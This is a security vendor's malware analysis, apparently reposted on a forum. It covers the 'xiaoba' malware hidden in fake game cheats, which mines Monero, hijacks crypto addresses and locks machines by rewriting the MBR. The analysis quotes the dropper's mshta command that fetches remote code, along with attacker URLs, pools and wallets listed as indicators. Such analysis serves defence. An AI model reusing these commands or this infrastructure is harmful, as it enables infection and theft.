-
-
[原创]装游戏辅助本想吃鸡 中挖矿病毒卡到死机
-
发表于: 2018-6-29 11:16
-
0x1 背景
近日,腾讯御见威胁情报中心监控到“xiaoba”勒索病毒的作者在网站xiaobaruanjian.xyz上提供荒野行动游戏辅助,同时将勒索病毒、挖矿木马、篡改主页木马暗藏在其中,一旦下载运行了该网站的所谓吃鸡“辅助”软件,会导致浏览器主页被篡改、电脑CPU被大量占用挖矿。
如果碰巧遇到中毒电脑有比特币、以太坊交易,病毒还会监视剪切板,当中毒电脑上发生比特币、以太坊币交易时,病毒会在交易瞬间将收款人地址替换为自己的,从而实现虚拟币交易抢劫。
更恶劣的是,xiaoba病毒作者还增加了勒索病毒功能,会改写硬盘主引导记录(MBR),让电脑无法开机,要求受害人通过聊天软件付款后才能解除病毒封锁。
0x2 荒野行动设备解封工具.exe
伪装成吃鸡游戏辅助工具的“荒野行动设备解封工具.cmd”,被打包为压缩包文件“荒野行动设备解封工具.exe”,该压缩包文件执行时会启动恶意脚本cmd。
“荒野行动设备解封工具.cmd”执行命令mshta.exe hxxp://xiaobaruanjian.xyz/XiaoBa/office
hxxp://xiaobaruanjian.xyz/XiaoBa/office下载木马exe,木马伪装正规软件文件名。
木马从自身资源中获取PE ,然后将其写入傀儡进程
傀儡进程执行恶意代码,下载木马到Temp目录,修改文件创建时间,然后执行木马文件。
木马运行时的http请求
0x3 挖矿
矿池一:emergency.fee.xmrig.com
钱包一:48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD
钱包状态:
矿池二:mine.ppxxmr.com:5555
钱包二:47XDhdPop9CMqSxnZsZv2ze9bg7HjxUx1YorwGCP5bqw4XBKGd6jWCA5rXV8XsJLNsaedqW1XjxvfQWg7tFV5wZWP66su1j
挖矿状态:
尝试在驱动层结束杀软进程
0x4 推广网址导航站
释放带某导航的桌面lnk
0x5 替换钱包地址
当检测到复制钱包地址的操作时,会用病毒作者自己的钱包地址去替换目标转帐地址,实现虚拟币钱包打劫。
替换比特币地址
替换以太坊地址
0x6 绝地求生超强辅助.exe
勒索
修改MBR锁定计算机
勒索提示
It's time to pay the money. Your computer is locked for special reasons.Contact Get unlocked method.
中文翻译:是时候付钱了,你的电脑因特殊原因被锁定。
发送被勒索机器ID到hxxp://xiaobaruanjian.xyz/MBR/pass.php
0x7 总结
黑客“xiaoba”以制作投放“xiaoba”勒索病毒出名。
此次将挖矿,勒索等木马同时植入“吃鸡”类游戏外挂中进行传播,增加了受到攻击后的危害种类。
木马作者公开建议使用者关闭杀毒软件,在这种情况下,荒野行动、绝地求生等“吃鸡”游戏玩家如果喜欢使用外挂,则有很高的几率中招。
0x8 安全建议
1、不使用来历不明的软件。因外挂程序带毒的比例远高于其他软件,游戏玩家应尽量不要使用外挂程序。
2、从网上下载的软件先使用电脑管家扫描。
3、玩游戏时,保持腾讯电脑管家为开启状态。
0x9 IOCs
域名:
xiaobaruanjian.xyz
url:
hxxp://xiaobaruanjian.xyz/xiaoba/lsass.png
hxxp://xiaobaruanjian.xyz/xiaoba/runtimebroker.png
hxxp://xiaobaruanjian.xyz/xiaoba/svchost.png
hxxp://xiaobaruanjian.xyz/xiaoba/psok.hta
hxxp://xiaobaruanjian.xyz/XiaoBa/office
hxxp://xiaobaruanjian.xyz/XiaoBa/RuntimeBroker.png
hxxp://xiaobaruanjian.xyz/XMR/xmrig32.png
hxxp://xiaobaruanjian.xyz/XMR/xmrig64.png
hxxp://xiaobaruanjian.xyz/XMR/config.txt
hxxp://xiaobaruanjian.xyz/MBR/pass.php
md5:
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
